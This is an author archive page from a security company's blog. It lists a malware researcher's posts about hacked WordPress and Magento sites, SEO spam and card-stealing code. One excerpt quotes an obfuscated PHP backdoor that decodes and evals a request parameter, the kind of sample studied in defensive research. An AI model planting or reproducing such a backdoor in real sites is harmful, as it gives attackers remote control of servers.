Denis Sinegubko

194 posts

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Hacked Websites Redirect to Porn from PDF / DOC Links

Denis Sinegubko

March 29, 2016

We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking…

Read the Post

Sucuri Labs

Backdoor Evolution: From Eval to Include

Denis Sinegubko

March 24, 2016

There used to be this backdoor that was mainly uploaded via old Gravity Forms vulnerabilities: < script language=”php” > $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100). chr(101).chr(99).chr(111).chr(100).chr(101); e v a l($a($_REQUEST[sam]));</script>…

Read the Post

Sucuri Labs

Fake Rating Rich Snippets

Denis Sinegubko

March 16, 2016

It’s quite a common black hat SEO practice to insert fake rating rich snippets on doorway pages to make them attract more attention on search…

Read the Post

Remote WordPress Brute Force Tools

Denis Sinegubko

March 10, 2016

Just a quick reminder: Don’t use common words and easy character combinations as passwords. Your compromised site can be used to hack third-party sites. A…

Read the Post

When a WordPress Plugin Goes Bad

Denis Sinegubko

March 4, 2016

Update March 7: The WordPress Directory team investigated and mitigated this issue by disconnecting the wooranker account from all plugins, reverting malicious changes in the…

Read the Post

Fake SUPEE-5344 Patch Steals Payment Details

Denis Sinegubko

February 12, 2016

Update 2/17: This post is not about hackers tricking webmasters into installing fake Magento security patch. It’s about malware that pretends to be an applied…

Read the Post

Magento PCI Compliance Issues and Theft Over TLS

Denis Sinegubko

February 5, 2016

With about 30% of the market share, Magento is gradually becoming a “WordPress” of the ecommerce world. Like WordPress, it becomes a major target for…

Read the Post

Massive Admedia/Adverting iFrame Infection

Denis Sinegubko

February 1, 2016

This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing…

Read the Post

Sucuri Labs

Encrypted Cc.php with credit card stealing code

Denis Sinegubko

January 25, 2016

The Magento Shoplift vulnerability had been patched about a year ago. And all this time we have been cleaning various Magento infections that steal customer…

Read the Post

Sucuri Labs

Obfuscating display:none cloaking

Denis Sinegubko

January 12, 2016

We’ve seen lots of JavaScript tricks that hide injected spam from human visitors while making it look “visible” for search engines. The most popular approach…

Read the Post

Malicious Pastebin Replacement for jQuery

Denis Sinegubko

January 6, 2016

Website hackers are always changing tactics and borrowing ideas from each other. One of the challenges of website security is staying on top of those…

Read the Post